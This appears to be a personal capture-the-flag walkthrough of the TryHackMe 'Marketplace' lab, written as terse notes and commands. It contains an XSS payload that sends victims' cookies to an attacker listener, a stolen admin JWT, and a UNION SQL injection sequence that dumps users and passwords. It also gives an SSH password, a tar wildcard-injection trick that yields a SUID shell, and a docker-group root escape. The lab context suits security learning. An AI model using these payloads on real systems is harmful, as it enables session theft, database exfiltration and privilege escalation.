The Marketplace
Room Link: https://tryhackme.com/room/marketplace
Initial Scan
Kali
nmap -A $VICTIM
Scan all ports
Kali
nmap -sV -sT -O -p 1-65535 $VICTIM
TCP/80 - HTTP
Kali
gobuster dir -u http://$VICTIM:32768 -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txtTCP/32768 - HTTP
Kali
gobuster dir -u http://$VICTIM:32768 -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt
XSS - Steal JVT
I tried updating the token it didn't work
Next we're going to try to steal the JWT from another user.
Kali
nc -lvnp 4444Browser
<script>document.location='http://$KALI:4444/XSS/grabber.php?c='+document.cookie</script>
This was annoying because if I went to my posts it wouldn't work so I went to Jakes post and changed the number from 2 to 6 to get to the report page. Then just clicked the report button
we got a token from a user that isn't us
We can see it is from Michael who is an admin.
Sent again but this time just forwarded the request so we could see what that script was doing
The script was printing the flag
This wasn't working before but after next time I went to this box tried I could just update the cookie from the browser and it worked.
Brower cookie
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VySWQiOjIsInVzZXJuYW1lIjoibWljaGFlbCIsImFkbWluIjp0cnVlLCJpYXQiOjE3MDE1MjgzODN9.O8218jJ0nmWedeewklX6fkb9sjlgH81ciU7dJG5l9YYWe add a order by and increase the number until we get an error to reveal how many fields there are.
After 5 it give us an error so we know there are four fields
We do a union select, first to try to show our 1s which isn't working because the first part of the statement runs successfully so theres no where to put our info
To work around this we make the userid as 0 which probably doesn't exist and we can start seeing our 1s
Get Version
Get Database
Get tables
UNION SELECT table_name,1,1,1 FROM information_schema.tables WHERE table_schema=database()
Get All tables by concat
-1 UNION SELECT group_concat(table_name),1,1,1%20 FROM information_schema.tables WHERE table_schema =database()
Get Columns for table users
-1%20UNION%20SELECT%20group_concat(column_name,column_type),1,1,1%20%20FROM%20information_schema.columns%20WHERE%20table_schema=marketplace
Get Columns for table items
-1 UNION SELECT group_concat(column_name,column_type),1,1,1 FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name='items' AND table_schema='marketplace'
Get Columns for table messages
-1 UNION SELECT group_concat(column_name,column_type),1,1,1 FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name='messages' AND table_schema='marketplace'
Get Columns for table messages
-1%20UNION%20SELECT%20group_concat(message_content),1,1,1%20FROM%20messages
Get usernames and passwords. The passwords aren't too useful at this point but now we have some usernames.
-1%20UNION%20SELECT%20group_concat(username,%27|%27,password),1,1,1%20FROM%20users
TCP/22 - SSH
Kali
ssh jake@$VICTIM
Password: @b_ENXkGYUCAv3zJ
Lateral Movement
Exploit: https://gtfobins.github.io/gtfobins/tar/
Jake can run a backup script as michael. The script is using a wildcard which we manipulate.
We can trick the script to run this to get a shell by making empty files with similar names
Victim
cd /opt/backups
mkdir priv
cd priv
touch ./--checkpoint=1
touch ./--checkpoint-action=exec=sh shell.sh
vi shell.shshell.sh
#!/bin/bash
cp /bin/bash /opt/backups/michealbash;
chmod +xs /opt/backups/michealbash;Victim
chmod +x shell.sh
rm -f ../backup.tar
sudo -u michael /opt/backups/backup.sh 
Privilege Escalation
Victim(micheal)
id
find / -name docker.sock 2>/dev/null
docker images
docker run -it -v /:/host/ alpine chroot /host/ shmichael is part of the docker group so it appears we're in a pod
There a few images to test from. I just ran the last command above and changes the image name until it worked. Exploit worked with nginx and mysql images as well.
Last updated